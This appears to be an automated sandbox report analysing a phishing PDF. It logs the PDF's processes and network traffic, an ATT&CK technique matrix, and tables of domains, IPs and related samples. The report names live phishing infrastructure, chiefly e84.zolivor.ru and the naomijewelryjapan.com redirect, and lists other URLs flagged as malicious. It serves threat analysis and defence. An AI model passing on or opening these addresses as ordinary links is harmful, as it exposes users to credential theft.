    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: classification engineClassification label: mal60.phis.winPDF@45/72@23/10
    Source: eCompleted_419z.pdfInitial sample: https://5m9sp7.naomijewelryjapan.com/
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-24 03-17-20-022.logJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\eCompleted_419z.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1480,i,3501403854715251483,1322142389642693983,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://5m9sp7.naomijewelryjapan.com/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2392,i,16451973532312144551,1979798678558124622,262144 /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1480,i,3501403854715251483,1322142389642693983,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2392,i,16451973532312144551,1979798678558124622,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: eCompleted_419z.pdfInitial sample: PDF keyword /JS count = 0
    Source: eCompleted_419z.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: eCompleted_419z.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Spearphishing Link
    Windows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Information Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    eCompleted_419z.pdf0%VirustotalBrowse
    eCompleted_419z.pdf3%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://5m9sp7.naomijewelryjapan.com/favicon.ico0%Avira URL Cloudsafe
    https://5m9sp7.naomijewelryjapan.com/main.js0%Avira URL Cloudsafe
    https://e84.zolivor.ru/favicon.ico100%Avira URL Cloudphishing
    https://5m9sp7.naomijewelryjapan.com/)0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        5m9sp7.naomijewelryjapan.com
        192.185.57.26
        truefalse
          high
          code.jquery.com
          151.101.2.137
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              www.google.com
              172.217.21.36
              truefalse
                high
                e84.zolivor.ru
                104.21.112.1
                truetrue
                  unknown
                  x1.i.lencr.org
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                      high
                      https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                        high
                        https://5m9sp7.naomijewelryjapan.com/false
                          unknown
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/false
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f6f283fab80c461/1735028274208/0c794be9e99943a3c3c5c96ce0a6874a8ab0d195fbf88e0680b941f8e8598dee/E4LtmRjqgUWrvFGfalse
                                high
                                https://e84.zolivor.ru/OSkl/true
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6f283fab80c461&lang=autofalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFmfalse
                                      high
                                      https://a.nel.cloudflare.com/report/v4?s=uIVv040PwPep6UsZ77yq0Gpisrq2Md6QC%2BNHamYjY1r67rQcC%2BJG3ketZmlH6tatsRHXOnRdZXMiGaMiNOBuGT%2B1RO562TfBQ0dC%2FnvlilupHTkVw9IcKyAvPRmM2Q%3D%3Dfalse
                                        high
                                        https://5m9sp7.naomijewelryjapan.com/main.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://e84.zolivor.ru/favicon.icofalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f6f283fab80c461/1735028274213/xzuZuxWFN2xIUodfalse
                                            high
                                            https://5m9sp7.naomijewelryjapan.com/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                                              high
                                              https://5m9sp7.naomijewelryjapan.com/)eCompleted_419z.pdffalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://code.jquery.com/jquery-3.3.1.min.jschromecache_201.10.drfalse
                                                high
                                                http://gmpg.org/xfn/11chromecache_201.10.drfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  192.185.57.26
                                                  5m9sp7.naomijewelryjapan.comUnited States
                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                  104.18.94.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.18.95.41
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  151.101.2.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  104.21.112.1
                                                  e84.zolivor.ruUnited States
                                                  13335CLOUDFLARENETUStrue
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  172.217.21.36
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  IP
                                                  192.168.2.16
                                                  192.168.2.4
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1580318
                                                  Start date and time:2024-12-24 09:16:22 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 46s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowspdfcookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:eCompleted_419z.pdf
                                                  Detection:MAL
                                                  Classification:mal60.phis.winPDF@45/72@23/10
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .pdf
                                                  • Found PDF document
                                                  • Close Viewer
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.32.238.122, 23.32.238.152, 23.32.238.113, 2.19.198.65, 23.32.238.128, 23.32.238.130, 23.32.238.160, 23.32.238.147, 23.32.238.89, 172.64.41.3, 162.159.61.3, 23.218.208.137, 2.20.40.170, 23.32.238.144, 23.32.238.146, 23.32.238.163, 23.32.238.161, 23.195.61.56, 2.22.50.144, 2.22.50.131, 192.229.221.95, 172.217.19.238, 173.194.220.84, 172.217.21.35, 172.217.17.46, 172.217.19.170, 172.217.19.234, 142.250.181.10, 142.250.181.106, 172.217.19.202, 142.250.181.138, 142.250.181.74, 172.217.21.42, 172.217.17.42, 172.217.17.74, 172.217.17.35, 216.58.208.234, 142.250.181.42, 172.217.19.10, 23.218.208.109, 34.237.241.83, 20.12.23.50, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  TimeTypeDescription
                                                  03:17:32API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  151.101.2.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                  • code.jquery.com/jquery-3.3.1.min.js
                                                  http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                                  • code.jquery.com/jquery-1.7.min.js
                                                  http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                  http://applela.za.com/isignesp.php?id=Get hashmaliciousUnknownBrowse
                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                  http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                                  • code.jquery.com/jquery-1.9.1.js
                                                  http://awqffg.newburuan2023.biz.id/next.phpGet hashmaliciousHTMLPhisherBrowse
                                                  • code.jquery.com/jquery-1.10.2.min.js
                                                  192.185.57.26https://timlovescars.com/s/_y.php?uni=proddy@chemtechnologiesltd.com&aidna=Ki50aW1sb3Zlc2NhcnMuY29t=&u=ZG9uYW1hcmlhLmNvbS5ici9hcy9kaGZnc2hkamQvcHJvZGR5QGNoZW10ZWNobm9sb2dpZXNsdGQuY29tGet hashmaliciousUnknownBrowse
                                                    104.18.94.41Play Aud.htmlGet hashmaliciousUnknownBrowse
                                                      Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                        7394231845.htmlGet hashmaliciousUnknownBrowse
                                                          https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                            YearEnd_Benefit_Bonus_Payout__Details__ChasChas.htmlGet hashmaliciousUnknownBrowse
                                                              https://contractorssteelform1flows.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                  http://northwesthousingservices.discussripped.comGet hashmaliciousHTMLPhisherBrowse
                                                                    https://account.book-ver.oneGet hashmaliciousUnknownBrowse
                                                                      104.18.95.41Play Aud.htmlGet hashmaliciousUnknownBrowse
                                                                        Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                          7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                            https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                                              YearEnd_Benefit_Bonus_Payout__Details__ChasChas.htmlGet hashmaliciousUnknownBrowse
                                                                                https://contractorssteelform1flows.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                  https://lvxsystem.info/Get hashmaliciousUnknownBrowse
                                                                                    https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                                      https://account.book-ver.oneGet hashmaliciousUnknownBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        code.jquery.comhttps://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                        • 151.101.66.137
                                                                                        https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.66.137
                                                                                        https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.66.137
                                                                                        Play Aud.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.66.137
                                                                                        vFile__0054seconds__Airborn.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.194.137
                                                                                        http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.130.137
                                                                                        https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.130.137
                                                                                        7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.2.137
                                                                                        https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.66.137
                                                                                        YearEnd_Benefit_Bonus_Payout__Details__ChasChas.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.66.137
                                                                                        challenges.cloudflare.comPlay Aud.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.95.41
                                                                                        http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.95.41
                                                                                        Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.18.94.41
                                                                                        7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.94.41
                                                                                        https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                                                        • 104.18.94.41
                                                                                        YearEnd_Benefit_Bonus_Payout__Details__ChasChas.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.95.41
                                                                                        https://contractorssteelform1flows.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.18.95.41
                                                                                        https://lvxsystem.info/Get hashmaliciousUnknownBrowse
                                                                                        • 104.18.95.41
                                                                                        https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.18.95.41
                                                                                        bg.microsoft.map.fastly.net3FG4bsfkEwmxFYY.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.232.214.172
                                                                                        #U5b89#U88c5#U52a9#U624b1.0.3.exeGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
